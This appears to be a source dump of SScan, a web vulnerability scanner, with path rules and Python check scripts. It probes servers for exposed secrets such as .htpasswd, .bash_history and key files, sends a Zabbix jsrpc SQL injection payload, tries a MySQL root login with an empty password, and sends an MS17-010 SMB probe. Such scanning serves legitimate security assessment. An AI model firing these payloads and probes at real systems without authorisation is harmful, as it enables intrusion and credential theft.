1 | # Security appliances
2 | /fort/pages/login.jsp {tag="网神SecFox安全审计系统"} {status=200} {root_only}
--------------------------------------------------------------------------------
/rules/sensitive_url.txt:
--------------------------------------------------------------------------------
1 | # each item must start with a right slash "/"
2 | # format:
3 | # /path {tag="text string to find"} {status=STATUS_CODE} {type="content-type must have this string"} {type_no="content-type must not have this string"}
4 | # {root_only} limits the check to the web root only
5 |
6 | /core {status=200} {tag="ELF"} {root_only}
7 | /debug.txt {status=200} {type="text/plain"} {root_only}
8 | /.bash_history {status=206} {type_no="html"} {root_only}
9 | /.rediscli_history {status=206} {type_no="html"} {root_only}
10 | /.bashrc {status=206} {type_no="html"} {root_only}
11 | /.bash_profile {status=206} {type_no="html"} {root_only}
12 | /.bash_logout {status=206} {type_no="html"} {root_only}
13 | /.vimrc {status=206} {type_no="html"} {root_only}
14 | /.DS_Store {status=206} {type_no="html"}
15 | /.history {status=206} {type_no="html"} {root_only}
16 | /.htpasswd {status=206} {type_no="html"} {root_only}
17 | /.htpasswd.bak {status=206} {type_no="html"} {root_only}
18 | /htpasswd.bak {status=206} {type_no="html"} {root_only}
19 | /nohup.out {status=206} {type_no="html"} {root_only}
20 | /.mysql_history {status=206} {type_no="html"} {root_only}
21 | /httpd.conf {status=200} {type_no="html"} {root_only}
22 |
23 |
24 | /server-status {tag="Apache Status "} {root_only}
25 | /solr/ {tag="Solr Admin "} {status=200} {type="html"} {root_only}
26 |
27 |
28 | # /nagios/
29 | # /kibana/
30 | /jmx-console/HtmlAdaptor {status=200} {tag="JBoss Management Console"} {root_only}
31 | /cacti/ {tag="Login to Cacti "} {root_only}
32 | /zabbix/ {tag="Zabbix "} {root_only}
33 |
34 | # jenkins
35 | /jenkins/static/f3a41d2f/css/style.css {type="text/css"} {status=200} {tag="jenkins-home-link"} {root_only}
36 | /static/f3a41d2f/css/style.css {type="text/css"} {status=200} {tag="jenkins-home-link"} {root_only}
37 | /script {status=200} {tag="Type in an arbitrary"} {root_only}
38 | /jenkins/script {status=200} {tag="Type in an arbitrary"} {root_only}
39 | /exit {status=200} {tag="POST required "} {root_only}
40 |
41 | /memadmin/index.php {tag="Login - MemAdmin"} {root_only}
42 | /ganglia/ {tag="Ganglia"} {root_only}
43 |
44 | /data.txt {status=200} {type="text/plain"} {root_only}
45 | /install.txt {status=200} {type="text/plain"} {root_only}
46 | /INSTALL.TXT {status=200} {type="text/plain"} {root_only}
47 |
48 | /a.out {status=200} {type_no="html"} {root_only}
49 | /key {status=200} {type_no="html"} {root_only}
50 | /keys {status=200} {type_no="html"} {root_only}
51 | /key.txt {status=200} {type="text/plain"} {root_only}
52 | /temp.txt {status=200} {type="text/plain"}
53 | /tmp.txt {status=200} {type="text/plain"}
54 |
55 | /php.ini {status=200} {type_no="html"} {tag="["}
56 |
--------------------------------------------------------------------------------
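
The directive syntax documented at the top of /rules/sensitive_url.txt is shared by every rule file above: a request path followed by optional {tag=}, {status=}, {type=}, {type_no=} and {root_only} conditions. As a rough illustration only (this is not SScan's actual loader; the function and field names are assumptions), one such line could be parsed like this:

```python
import re

# Matches one {key}, {key=bare} or {key="quoted"} directive in a rule line.
RULE_RE = re.compile(r'\{(\w+)(?:=(?:"([^"]*)"|([^}]*)))?\}')


def parse_rule(line):
    """Hypothetical parser for a single rule line; returns None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith('#'):
        return None
    rule = {'path': line.split()[0], 'root_only': False}   # the path always comes first
    for key, quoted, bare in RULE_RE.findall(line):
        if key == 'root_only':
            rule['root_only'] = True                        # flag directive, no value
        else:
            rule[key] = quoted if quoted else bare
    return rule


print(parse_rule('/debug.txt {status=200} {type="text/plain"} {root_only}'))
# {'path': '/debug.txt', 'root_only': True, 'status': '200', 'type': 'text/plain'}
```
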
/rules/shell_scripts.txt:
--------------------------------------------------------------------------------
1 |
2 | /install.sh {status=206} {root_only} {tag='#!/'}
3 | /deploy.sh {status=206} {root_only} {tag='#!/'}
4 | /upload.sh {status=206} {root_only} {tag='#!/'}
5 | /setup.sh {status=206} {root_only} {tag='#!/'}
6 | /backup.sh {status=206} {root_only} {tag='#!/'}
7 | /rsync.sh {status=206} {root_only} {tag='#!/'}
8 | /sync.sh {status=206} {root_only} {tag='#!/'}
9 | /test.sh {status=206} {root_only} {tag='#!/'}
10 | /run.sh {status=206} {root_only} {tag='#!/'}
11 | /start.sh {status=206} {root_only} {tag='#!/'}
12 | /stop.sh {status=206} {root_only} {tag='#!/'}
13 | /build.sh {status=206} {root_only} {tag='#!/'}
--------------------------------------------------------------------------------
/rules/source_code_disclosure.txt:
--------------------------------------------------------------------------------
1 |
2 | /index.php.bak {status=206} {type="application/"} {root_only}
3 | /examples/servlets/servlet/SessionExample {status=200} {type="html"} {tag="Sessions Example "} {root_only}
4 | /manager/html {status=401} {root_only}
--------------------------------------------------------------------------------
/rules/web_editors.txt:
--------------------------------------------------------------------------------
1 |
2 | # Web Editors
3 | /fckeditor/_samples/default.html {tag="FCKeditor"} {type="html"} {root_only}
4 | /ckeditor/samples/ {tag="CKEditor Samples "} {root_only}
5 | /editor/ckeditor/samples/ {tag="CKEditor Samples "} {root_only}
6 | /ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com "} {root_only}
7 | /editor/ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com"} {root_only}
8 | /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php {status=200} {type="html"} {tag="init_spell()"} {root_only}
9 | /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php {status=200} {type="html"} {tag="init_spell()"} {root_only}
10 |
11 |
12 | # ueditor SSRF
13 | #/ueditor/ueditor.config.js {status=200} {tag="/php/getRemoteImage.php"} {root_only}
14 | /ueditor/php/getRemoteImage.php {tag="'tip':'"} {status=200} {root_only}
15 |
16 |
--------------------------------------------------------------------------------
/rules/white.list:
--------------------------------------------------------------------------------
1 | # text to search in doc
2 | # regex can be used
3 |
4 | # matched entries are flagged as hits immediately
5 |
6 |
7 | {text="
Index of"}
8 |
9 | {text="phpMyAdmin "}
10 |
11 | {text="allow_url_fopen"}
12 |
13 | {text="MemAdmin"}
14 |
15 | {text="This is the default start page for the Resin server"}
16 |
17 | {text="Apache Tomcat"}
18 |
19 | {text="request_uri"}
20 |
21 | {text="Login to Cacti "}
22 |
23 | {text="Zabbix "}
24 |
25 | {text="Dashboard [Jenkins]"}
26 |
27 | {text="Graphite Browser"}
28 |
29 | {text="'/app/kibana'"}
30 |
31 | {text="http://www.atlassian.com/software/jira"}
32 |
33 | {regex_text=" on line "}
56 |
57 | {text="The proxy server could not handle the request"}
58 |
59 | {regex_text=".*后台.* "}
60 |
61 |
62 | {regex_text=".*Swagger UI.* "}
63 |
64 | {regex_text=".*管理.* "}
65 |
66 | {regex_text="*.background.* "}
67 |
--------------------------------------------------------------------------------
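
As the comments in /rules/white.list say, a response is flagged as a hit as soon as any {text=} substring or {regex_text=} pattern matches the page body. A minimal sketch of that matching step, assuming the entries have already been read from the file (the function names here are illustrative, not SScan's own):

```python
import re


def load_white_list(path='rules/white.list'):
    """Collect plain-text and regex entries from a white.list-style file."""
    texts, regexes = [], []
    with open(path, encoding='utf-8') as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith('#'):
                continue
            m = re.match(r'\{text="(.*)"\}$', line)
            if m:
                texts.append(m.group(1))
                continue
            m = re.match(r'\{regex_text="(.*)"\}$', line)
            if m:
                regexes.append(re.compile(m.group(1)))
    return texts, regexes


def is_hit(html_doc, texts, regexes):
    """True if the response body matches any white.list entry."""
    return any(t in html_doc for t in texts) or any(r.search(html_doc) for r in regexes)
```
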
/rules/zabbix_jsrpc_sqli.txt:
--------------------------------------------------------------------------------
1 | # Zabbix SQLi
2 |
3 | /zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1 {tag="Duplicate entry"} {status=200} {type="text/plain"} {root_only}
4 |
5 | /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1 {tag="Duplicate entry"} {status=200} {type="text/plain"} {root_only}
6 |
7 |
--------------------------------------------------------------------------------
/scripts/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/scripts/disabled/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 |
5 | # C extensions
6 | *.so
7 |
8 | # Distribution / packaging
9 | .Python
10 | env/
11 | build/
12 | develop-eggs/
13 | dist/
14 | downloads/
15 | eggs/
16 | .eggs/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | *.egg-info/
22 | .installed.cfg
23 | *.egg
24 | .idea/
25 |
26 | # PyInstaller
27 | # Usually these files are written by a python script from a template
28 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
29 | *.manifest
30 | *.spec
31 |
32 | # Installer logs
33 | pip-log.txt
34 | pip-delete-this-directory.txt
35 |
36 | # Unit test / coverage reports
37 | htmlcov/
38 | .tox/
39 | .coverage
40 | .coverage.*
41 | .cache
42 | nosetests.xml
43 | coverage.xml
44 | *,cover
45 |
46 | # Translations
47 | *.mo
48 | *.pot
49 |
50 | # Django stuff:
51 | *.log
52 |
53 | # Sphinx documentation
54 | docs/_build/
55 |
56 | # PyBuilder
57 | target/
58 | *.html
59 |
--------------------------------------------------------------------------------
/scripts/disabled/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/scripts/disabled/__init__.py
--------------------------------------------------------------------------------
/scripts/disabled/smb_ms17010.py:
--------------------------------------------------------------------------------
1 | # @Author : helit
2 |
3 | import socket
4 | import binascii
5 | from lib.common.utils import save_script_result
6 |
7 | ports_to_check = 445
8 |
9 |
10 | def get_tree_connect_request(ip, tree_id):
11 | ipc = "005c5c" + binascii.hexlify(ip) + "5c49504324003f3f3f3f3f00"
12 | ipc_len_hex = hex(len(ipc) / 2).replace("0x", "")
13 | smb = "ff534d4275000000001801280000000000000000000000000000729c" + binascii.hexlify(
14 | tree_id) + "c4e104ff00000000000100" + ipc_len_hex + "00" + ipc
15 | tree = "000000" + hex(len(smb) / 2).replace("0x", "") + smb
16 | tree_connect_request = binascii.unhexlify(tree)
17 | return tree_connect_request
18 |
19 |
20 | def do_check(self, url):
21 | if url != '/' or 445 not in self.ports_open:
22 | return
23 |
24 | ip = self.host.split(':')[0]
25 | port = 445
26 |
27 | timeout = 5
28 | negotiate_protocol_request = binascii.unhexlify(
29 | "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312"
30 | "e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
31 | session_setup_request = binascii.unhexlify(
32 | "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff02000100000000003100000"
33 | "00000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e5059746249"
34 | "55473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
35 | try:
36 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
37 | s.settimeout(timeout)
38 | s.connect((ip, port))
39 | s.send(negotiate_protocol_request)
40 | s.recv(1024)
41 | s.send(session_setup_request)
42 | data = s.recv(1024)
43 | user_id = data[32:34]
44 | session_setup_request_2 = binascii.unhexlify(
45 | "00000150ff534d4273000000001801280000000000000000000000000000729c" + binascii.hexlify(
46 | user_id).decode() + "c4e10cff000000dfff0200010000000000f200000000005cd0008015014e544c4d535350000300000018001800"
47 | "40000000780078005800000002000200d000000000000000d200000020002000d200000000000000f200000005"
48 | "0208a2ec893eacfc70bba9afefe94ef78908d37597e0202fd6177c0dfa65ed233b731faf86b02110137dc50101"
49 | "000000000000004724eed7b8d2017597e0202fd6177c0000000002000a0056004b002d005000430001000a0056"
50 | "004b002d005000430004000a0056004b002d005000430003000a0056004b002d00500043000700080036494bf1"
51 | "d7b8d20100000000000000002e003400310042006c007400410031004e00500059007400620049005500470030"
52 | "0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
53 | s.send(session_setup_request_2)
54 | s.recv(1024)
55 | session_setup_request_3 = binascii.unhexlify(
56 | "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff0200010000000000000"
57 | "0000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
58 | s.send(session_setup_request_3)
59 | data = s.recv(1024)
60 | tree_id = data[32:34]
61 | smb = get_tree_connect_request(ip, tree_id)
62 | s.send(smb)
63 | s.recv(1024)
64 | poc = binascii.unhexlify(
65 | "0000004aff534d422500000000180128000000000000000000000000" + binascii.hexlify(
66 | user_id).decode() + "729c" + binascii.hexlify(
67 | tree_id).decode() + "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")
68 | s.send(poc)
69 | data = s.recv(1024)
70 | s.close()
71 | if "\x05\x02\x00\xc0" in data:
72 | save_script_result(self, '', ip + ':445', '', 'MS17010 SMB Remote Code Execution')
73 | except Exception as e:
74 | return False
75 |
--------------------------------------------------------------------------------
/scripts/discuz_backup_file.py:
--------------------------------------------------------------------------------
1 | from lib.common.utils import save_script_result
2 |
3 |
4 | def do_check(self, url):
5 | if url == '/' and self.session:
6 | if self.index_status == 301 and self.index_headers.get('location', '').find('forum.php') >= 0 or \
7 | str(self.index_headers).find('_saltkey=') > 0:
8 |
9 | url_lst = ['/config/config_ucenter.php.bak',
10 | '/config/.config_ucenter.php.swp',
11 | '/config/.config_global.php.swp',
12 | '/config/config_global.php.1',
13 | '/uc_server/data/config.inc.php.bak',
14 | '/config/config_global.php.bak',
15 | '/include/config.inc.php.tmp']
16 |
17 | for _url in url_lst:
18 | status, headers, html_doc = self.http_request(_url)
19 | if status == 200 or status == 206:
20 | if html_doc.find('<?php') >= 0:
21 | save_script_result(self, status, self.base_url + _url, 'Discuz Backup File Found')
22 |
23 | # getcolor DOM XSS
24 | status, headers, html_doc = self.http_request('/static/image/admincp/getcolor.htm')
25 | if html_doc.find("if(fun) eval('parent.'+fun+'") > 0:
26 | save_script_result(self, status, self.base_url + '/static/image/admincp/getcolor.htm',
27 | '', 'Discuz getcolor DOM XSS')
28 |
--------------------------------------------------------------------------------
/scripts/is_admin_site.py:
--------------------------------------------------------------------------------
1 | from lib.common.utils import save_script_result
2 |
3 |
4 | def do_check(self, url):
5 | if url == '/':
6 | if self.session and self.index_status in (301, 302):
7 | for keyword in ['admin', 'login', 'manage', 'backend']:
8 | if self.index_headers.get('location', '').find(keyword) >= 0:
9 | save_script_result(self, self.index_status, self.base_url + '/', 'Admin Site')
10 | break
11 |
--------------------------------------------------------------------------------
/scripts/kong_admin_rest_api.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 |
3 | from lib.common.utils import save_script_result
4 | import requests
5 |
6 |
7 | ports_to_check = 8001 # default service port
8 |
9 |
10 | def do_check(self, url):
11 | if url != '/':
12 | return
13 |
14 | if self.session and self.index_headers.get('Server', '').startswith('kong/'):
15 | save_script_result(self, '200', self.base_url, 'Kong Admin Rest API')
16 |
17 | if self.port == 8001: # an HTTP connection pool for port 8001 is already maintained, so the check above has already covered it
18 | return
19 |
20 | if 8001 not in self.ports_open: # port 8001 is not open
21 | return
22 |
23 | # If the target is an HTTP service on a non-standard port,
24 | # port 8001 has to be probed separately
25 |
26 | resp = requests.get('http://%s:8001/' % self.host)
27 | headers = resp.headers
28 | if headers.get('Server', '').startswith('kong/'):
29 | save_script_result(self, resp.status_code, 'http://%s:8001' % self.host, 'Kong Admin Rest API')
30 |
--------------------------------------------------------------------------------
/scripts/log_files.py:
--------------------------------------------------------------------------------
1 | # Logs
2 | # /access.log {status=206} {type="application/octet-stream"} {root_only}
3 | # /error.log {status=206} {type="application/octet-stream"} {root_only}
4 | # /log/access.log {status=206} {type="application/octet-stream"} {root_only}
5 | # /log/error.log {status=206} {type="application/octet-stream"} {root_only}
6 | # /log/log.log {status=206} {type="application/octet-stream"} {root_only}
7 | # /logs/error.log {status=206} {type="application/octet-stream"} {root_only}
8 | # /logs/access.log {status=206} {type="application/octet-stream"} {root_only}
9 | # /errors.log {status=206} {type="application/octet-stream"} {root_only}
10 | # /debug.log {status=206} {type="application/octet-stream"} {root_only}
11 | # /db.log {status=206} {type="application/octet-stream"} {root_only}
12 |
13 | # /log.txt {status=200} {type="text/plain"}
14 | # /log.tar.gz {status=206} {type="application/octet-stream"} {root_only}
15 | # /log.rar {status=206} {type="application/octet-stream"} {root_only}
16 | # /log.zip {status=206} {type="application/octet-stream"} {root_only}
17 | # /log.tgz {status=206} {type="application/octet-stream"} {root_only}
18 | # /log.tar.bz2 {status=206} {type="application/octet-stream"} {root_only}
19 | # /log.7z {status=206} {type="application/octet-stream"} {root_only}
20 |
21 | from lib.common.utils import save_script_result
22 |
23 |
24 | def do_check(self, url):
25 | if url == '/' and self.session:
26 | folders = ['']
27 | for log_folder in ['log', 'logs', '_log', '_logs', 'accesslog', 'errorlog']:
28 | status, headers, html_doc = self.http_request('/' + log_folder)
29 |
30 | if status in (301, 302):
31 | location = headers.get('location', '')
32 | if location.startswith(self.base_url + '/' + log_folder + '/') or \
33 | location.startswith('/' + log_folder + '/'):
34 | folders.append(log_folder)
35 | self.enqueue(log_folder)
36 | self.crawl('/' + log_folder + '/')
37 |
38 | if status == 206 and self._404_status != 206:
39 | save_script_result(self, status, self.base_url + '/' + log_folder, '',
40 | 'Log File Found')
41 |
42 | url_lst = ['access.log', 'www.log', 'error.log', 'log.log', 'sql.log',
43 | 'errors.log', 'debug.log', 'db.log', 'install.log',
44 | 'server.log', 'sqlnet.log', 'WS_FTP.log', 'database.log', 'data.log', 'app.log',
45 | 'log.tar.gz', 'log.rar', 'log.zip',
46 | 'log.tgz', 'log.tar.bz2', 'log.7z']
47 |
48 | for log_folder in folders:
49 | for _url in url_lst:
50 | url_prefix = '/' + log_folder if log_folder else ''
51 | status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
52 | # print '/' + log_folder + '/' + _url
53 | if status == 206 and \
54 | (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0):
55 | save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
56 | '', 'Log File')
57 |
58 | for log_folder in folders:
59 | for _url in ['log.txt', 'logs.txt']:
60 | url_prefix = '/' + log_folder if log_folder else ''
61 | status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
62 | # print '/' + log_folder + '/' + _url
63 | if status == 206 and headers.get('content-type', '').find('text/plain') >= 0:
64 | save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
65 | '', 'Log File')
66 |
--------------------------------------------------------------------------------
/scripts/mysql_Empty_pwd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # MySQL empty password
6 |
7 | import pymysql
8 | from lib.common.utils import save_script_result
9 |
10 |
11 | ports_to_check = 3306 # default port to scan
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 3306
18 | if self.scheme == 'mysql' and self.port != 3306: # non-standard port
19 | port = self.port
20 | elif 3306 not in self.ports_open:
21 | return
22 |
23 | try:
24 | conn = pymysql.connect(host=self.host, port=port, user='root', password='', charset='utf8', autocommit=True)
25 | conn.close()
26 | save_script_result(self, '', 'mysql://%s:%s' % (self.host, port), '', 'Mysql empty password')
27 | except Exception as e:
28 | pass
29 |
--------------------------------------------------------------------------------
/scripts/outlook_web_app.py:
--------------------------------------------------------------------------------
1 | # Outlook Web APP
2 |
3 | import http.client
4 | from lib.common.utils import save_script_result
5 |
6 |
7 | def do_check(self, url):
8 | if url == '/' and self.session:
9 | if self.index_status == 302 and self.index_headers.get('location', '').lower() == 'https://%s/owa' % self.host:
10 | save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
11 | return
12 |
13 | status, headers, html_doc = self.http_request('/ews/')
14 |
15 | if status == 302:
16 | redirect_url = headers.get('location', '')
17 | if redirect_url == 'https://%shttp://%s/ews/' % (self.host, self.host):
18 | save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
19 | return
20 | if redirect_url == 'https://%s/ews/' % self.host:
21 | try:
22 | conn = http.client.HTTPSConnection(self.host)
23 | conn.request('HEAD', '/ews')
24 | if conn.getresponse().status == 401:
25 | save_script_result(self, 401, redirect_url, 'OutLook Web APP Found')
26 | conn.close()
27 | except Exception as e:
28 | pass
29 | return
30 |
31 | elif status == 401:
32 | if headers.get('Server', '').find('Microsoft-IIS') >= 0:
33 | save_script_result(self, 401, self.base_url + '/ews/', 'OutLook Web APP Found')
34 | return
35 |
--------------------------------------------------------------------------------
/scripts/readme.txt:
--------------------------------------------------------------------------------
1 |
2 | 请将你编写的脚本置于这个文件夹中
3 |
4 | Place your scripts in this folder
5 |
6 |
--------------------------------------------------------------------------------
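
The scripts in this folder all follow the same contract visible in the surrounding script files: an optional module-level ports_to_check and a do_check(self, url) entry point that reports findings through save_script_result. A minimal template for a new check, where the 'example' scheme, port 12345 and the 'EXAMPLE' banner are pure placeholders (a hedged sketch, not a working plugin):

```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-

# Illustrative template for a new SScan script.
# The 'example' scheme, port 12345 and the 'EXAMPLE' banner are placeholders.

import socket
from lib.common.utils import save_script_result

ports_to_check = 12345  # default port the framework probes for this script


def do_check(self, url):
    if url != '/':  # run once per target, against the web root
        return
    port = 12345
    if self.scheme == 'example' and self.port != 12345:  # non-standard port
        port = self.port
    elif 12345 not in self.ports_open:  # default port not open
        return
    try:
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.host, port))
        s.send(b'PING\r\n')
        banner = s.recv(1024).decode(errors='ignore')
        s.close()
        if 'EXAMPLE' in banner:
            save_script_result(self, '', 'example://%s:%s' % (self.host, port),
                               '', 'Example Service Unauthorized Access')
    except Exception:
        pass
```
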
/scripts/scan_by_hostname_or_folder.py:
--------------------------------------------------------------------------------
1 | # /{hostname_or_folder}.zip {status=206} {type="application/"} {root_only}
2 | # /{hostname_or_folder}.rar {status=206} {type="application/"} {root_only}
3 | # /{hostname_or_folder}.tar.gz {status=206} {type="application/"} {root_only}
4 | # /{hostname_or_folder}.tar.bz2 {status=206} {type="application/"} {root_only}
5 | # /{hostname_or_folder}.tgz {status=206} {type="application/"} {root_only}
6 | # /{hostname_or_folder}.7z {status=206} {type="application/"} {root_only}
7 | # /{hostname_or_folder}.log {status=206} {type="application/"} {root_only}
8 | #
9 | # /{sub}.zip {status=206} {type="application/"} {root_only}
10 | # /{sub}.rar {status=206} {type="application/"} {root_only}
11 | # /{sub}.tar.gz {status=206} {type="application/"} {root_only}
12 | # /{sub}.tar.bz2 {status=206} {type="application/"} {root_only}
13 | # /{sub}.tgz {status=206} {type="application/"} {root_only}
14 | # /{sub}.7z {status=206} {type="application/"} {root_only}
15 | #
16 | # /../{hostname_or_folder}.zip {status=206} {type="application/"}
17 | # /../{hostname_or_folder}.rar {status=206} {type="application/"}
18 | # /../{hostname_or_folder}.tar.gz {status=206} {type="application/"}
19 | # /../{hostname_or_folder}.tar.bz2 {status=206} {type="application/"}
20 | # /../{hostname_or_folder}.tgz {status=206} {type="application/"}
21 | # /../{hostname_or_folder}.7z {status=206} {type="application/"}
22 | # /../{hostname_or_folder}.log {status=206} {type="application/"}
23 |
24 |
25 | from lib.common.utils import save_script_result
26 |
27 |
28 | def do_check(self, url):
29 | if not self.session:
30 | return
31 | extensions = ['.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log', '.sql']
32 |
33 | if url == '/' and self.domain_sub:
34 | file_names = [self.host.split(':')[0], self.domain_sub]
35 | for name in file_names:
36 | for ext in extensions:
37 | status, headers, html_doc = self.http_request('/' + name + ext)
38 | if status == 206 and \
39 | (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0) or \
40 | (ext == '.sql' and html_doc.find("CREATE TABLE") >= 0):
41 | save_script_result(self, status, self.base_url + '/' + name + ext,
42 | '', 'Compressed File')
43 |
44 | elif url != '/':
45 | # sub folders like /aaa/bbb/
46 | folder_name = url.split('/')[-2]
47 | if len(folder_name) >= 4:
48 | url_prefix = url[: -len(folder_name) - 1]
49 | for ext in extensions:
50 | status, headers, html_doc = self.http_request(url_prefix + folder_name + ext)
51 | if status == 206 and headers.get('content-type', '').find('application/') >= 0:
52 | save_script_result(self, status, self.base_url + url_prefix + folder_name + ext,
53 | '', 'Compressed File')
54 |
--------------------------------------------------------------------------------
/scripts/sensitive_folders.py:
--------------------------------------------------------------------------------
1 | from lib.common.utils import save_script_result
2 |
3 | folders = """
4 | /admin
5 | /bak
6 | /backup
7 | /conf
8 | /config
9 | /db
10 | /debug
11 | /data
12 | /database
13 | /deploy
14 | /WEB-INF
15 | /install
16 | /manage
17 | /manager
18 | /monitor
19 | /tmp
20 | /temp
21 | /test
22 | """
23 |
24 |
25 | def do_check(self, url):
26 | if url != '/' or not self.session or self._404_status == 301:
27 | return
28 |
29 | _folders = folders.split()
30 |
31 | for _url in _folders:
32 | if not _url:
33 | continue
34 | status, headers, html_doc = self.http_request(_url)
35 |
36 | if status in (301, 302):
37 | location = headers.get('location', '')
38 | if location.startswith(self.base_url + _url + '/') or location.startswith(_url + '/'):
39 | # save_user_script_result(self, status, self.base_url + _url,
40 | # '', 'Possible Sensitive Folder Found')
41 | self.enqueue(_url + '/')
42 | self.crawl(_url + '/')
43 |
44 | if status == 206 and self._404_status != 206:
45 | save_script_result(self, status, self.base_url + _url,
46 | '', 'Possible Sensitive File Found')
47 |
--------------------------------------------------------------------------------
/scripts/tools/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/scripts/tools/__init__.py
--------------------------------------------------------------------------------
/scripts/tools/port_scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 | # set ports_to_check to the one or more ports you want to scan
4 | # python BBScan.py --scripts-only --script port_scan --host www.baidu.com --network 16 --save-ports ports_80.txt
5 |
6 | ports_to_check = [80]
7 |
8 |
9 | def do_check(self, url):
10 | pass
--------------------------------------------------------------------------------
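
port_scan.py shows that a script may declare ports without performing any checks of its own: the framework reads the module-level ports_to_check attribute (a single port or a list) and probes those ports for every target. A rough sketch of how such declarations could be collected from the scripts package; the importlib-based loader below is an assumption for illustration, not SScan's actual implementation:

```python
import importlib
import pkgutil

import scripts  # the package this folder defines


def collect_ports_to_check():
    """Gather every port declared via ports_to_check across the script modules."""
    ports = set()
    for info in pkgutil.iter_modules(scripts.__path__):
        module = importlib.import_module('scripts.' + info.name)
        declared = getattr(module, 'ports_to_check', None)
        if declared is None:
            continue
        if isinstance(declared, int):   # e.g. ports_to_check = 6379
            ports.add(declared)
        else:                           # e.g. ports_to_check = [80]
            ports.update(declared)
    return sorted(ports)
```
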
/scripts/unauthorized_access_CouchDB.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # CouchDB unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 5984 # default port to scan
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 5984
18 | if self.scheme == 'CouchDB' and self.port != 5984: # non-standard port
19 | port = self.port
20 | elif 5984 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/_utils/'
25 | r = requests.get(url, timeout=5, verify=False, headers=default_headers)
26 | if 'couchdb-logo' in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/_utils/' % (self.host, port), 'CouchDB Unauthorized Access')
28 | except Exception as e:
29 | pass
30 |
31 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_Hadoop.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # Hadoop unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 50070 # default port to scan
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 50070
18 | if self.scheme == 'Hadoop' and self.port != 50070: # non-standard port
19 | port = self.port
20 | elif 50070 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/dfshealth.html'
25 | r = requests.get(url, timeout=5, verify=False, headers = default_headers)
26 | if 'hadoop.css' in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/dfshealth.html' % (self.host, port), 'Hadoop Unauthorized Access')
28 | except Exception as e:
29 | pass
30 |
31 |
